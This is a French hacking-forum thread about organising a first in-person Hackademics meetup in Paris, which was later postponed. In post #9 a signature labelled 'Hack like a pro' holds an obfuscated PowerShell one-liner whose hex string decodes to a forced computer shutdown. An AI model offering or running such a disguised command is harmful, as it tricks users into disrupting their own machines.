Annonce

Réduire
Aucune annonce.

Inscrivez-vous à la 1ère IRL d'Hackademics

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • News Inscrivez-vous à la 1ère IRL d'Hackademics

    Bonjour à tous !

    Comme _47 l'a annoncé dans un précédent post, nous allons organiser la première IRL d'Hackademics ! Voici donc des informations sur cet événement :

    Qu'est-ce qu'on va y faire ?
    Eh bien, pour cette première édition nous allons tout simplement discuter, nous présenter etc. Pour les prochaines éditions nous pourrons mettre en place des ordres du jour

    C'est où ?
    Pour cette première édition nous avons décidé de nous réunir dans un bar (qui sera choisi ultérieurement) à Paris.

    C'est quand ?
    Justement ! Nous avons besoin de vous pour ça, n'hésitez pas à vous inscrire sur ce Doodle : https://doodle.com/poll/v9ndk2easgs3n6yx
    Nous y proposons quatre dates : les 27, 28, 29 et 30 octobre, la date qui sera retenue sera celle avec le plus de votes !

    N'hésitez pas si vous avez des questions
    ++++++++++[>+++++++>++++++++++>+++>+<<<<-]>++.>+.+++++++..+++.>++.<<+++++++++++++++.>.+++.------.--------.>+.>.

  • #2
    Merci Overflow pour ma part je me suis inscrit !


    Suivre Hackademics: Twitter, Google+, Facebook.

    Commentaire


    • #3
      Bonjour,

      N'étant plus en région parisienne, je ne pourrais me joindre à vous.

      Cordialement

      Commentaire


      • #4
        Hey !

        Sympa comme initiative

        Je vais faire au mieux !

        Commentaire


        • #5
          Hello à tous,

          Bonne idée ! Malheureusement difficile pour moi qui suit à plus de 350 km de vous rencontrer, sinon ça aurait été avec grand plaisir que j'aurai trinqué avec vous.
          En tout cas je vous souhaite pour ceux/celles pouvant y participer, un très bon moment ensemble.

          Quand à nous, nous nous retrouverons sur le forum, à bientôt

          Commentaire


          • #6
            Bonsoir,

            Cela aurait été avec plaisir mais je suis deux fois plus loin que fred.
            Il m'arrive d'aller sur Paris mais je doute que les dates correspondent. Enfin, si cela était, je ferais signe.
            Ce serait dans quel arrondissement ?

            Commentaire


            • #7
              Nous n'avons pas encore arrêté de décision concernant l'arrondissement.

              Ça dépendra principalement du bar (et donc, du nombre d'inscrits).
              ++++++++++[>+++++++>++++++++++>+++>+<<<<-]>++.>+.+++++++..+++.>++.<<+++++++++++++++.>.+++.------.--------.>+.>.

              Commentaire


              • #8
                Hello,

                Je suis chaud
                Mes dispos dépendrons de l'arrondissement.

                Commentaire


                • #9
                  C'était bien du coup ?
                  Hack like a pro :
                  PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

                  Commentaire


                  • #10
                    Je me posais la même question comme octobre mourrait...

                    Commentaire


                    • #11
                      Hello,

                      Comme nous n'avons eu que très peu de réponses nous avons décidé de remettre ça à plus tard

                      On vous refera un topic !
                      ++++++++++[>+++++++>++++++++++>+++>+<<<<-]>++.>+.+++++++..+++.>++.<<+++++++++++++++.>.+++.------.--------.>+.>.

                      Commentaire


                      • #12
                        Malheureusement, comme certains ici, je ne suis plus parisien (même si j'avoue que ça me manque)... Sinon, je serais très probablement venu (en tout cas inscrit).

                        Commentaire

                        Chargement...
                        X